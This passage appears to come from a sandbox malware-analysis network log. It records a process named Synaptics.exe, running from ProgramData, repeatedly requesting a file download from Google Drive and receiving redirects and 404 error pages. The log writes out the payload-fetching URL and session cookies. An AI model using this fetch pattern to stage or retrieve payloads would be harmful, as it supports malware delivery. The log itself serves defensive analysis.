Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:45 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:45 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 78 70 74 45 32 4f 65 41 72 68 74 4b 6a 6a 71 2d 71 36 62 46 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="XxptE2OeArhtKjjq-q6bFw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:45 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.10	50018	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:45 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=GiwW7nFNCeCO8Vg7wwsk6suN9RcZZ4j9ZLJR1B3wAEH_GuydJZJ-sUMPZVW2sIgNgfxCBNcZZSXk4njGZn72h6vINgii_8bw5RMoevPRczQyPhXfhuvp4sy08_feQ3U2bfHNMhWC3QWZ20sj7H_3Nhd0PaSAIkRd_FO7N8YvVF9V1NJq24kCijsN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.10	50019	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:45 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.10	50020	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:45 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.10	50027	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:46 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:46 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:46 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-blrm0i48zM3Dp4Z82vUm5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.10	50028	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:46 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:46 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:46 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-G6i8dbEDCah6vnmSp1ZxoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.10	50035	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:47 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:48 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:47 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-ygqPEc8qs3rHdXnr2rEg7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.10	50034	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:47 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:48 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4zlw6neSSWE50N0MH7qrf1oplXpqOv8ftYMPgI7d49yPn4sGjsWECJ7Nvg_L5mhylfSbHDhg4 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:48 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-UmrAe5BPqU_AGRZKkqlYBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:48 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:48 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 74 6d 48 4f 70 73 65 4e 6b 55 79 6e 39 70 61 43 4d 77 34 6b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="vtmHOpseNkUyn9paCMw4kQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:48 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.10	50032	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:47 UTC	388	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:48 UTC	1250	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5Q7IX9VcQ-wD5o0lLa89OIu6iVsjmfnJ-X4mPaRBYb1QpOTd2k_A3tW8VyCKH2USPMRqOKR5A Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:48 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-pEKc4dlj7xT2I3fVH8-ICw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:48 UTC	140	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:48 UTC	1390	IN	Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 79 71 36 75 4d 6f 6b 6c 4e 5a 45 6c 61 7a 74 57 70 64 42 43 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b Data Ascii: 404 (Not Found)!!1</title><style nonce="Ayq6uMoklNZElaztWpdBCA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:48 UTC	122	IN	Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.10	50033	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:47 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:48 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:47 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-Yjfez4UC7yBlCacRAVqfNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.10	50047	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:48 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:49 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:48 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-KVGeQANocdXd-c0qXFbLCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.10	50048	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:48 UTC	345	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR
2024-12-30 10:25:49 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:48 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-7jSyl9MDbJUp3wpwm18eYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, 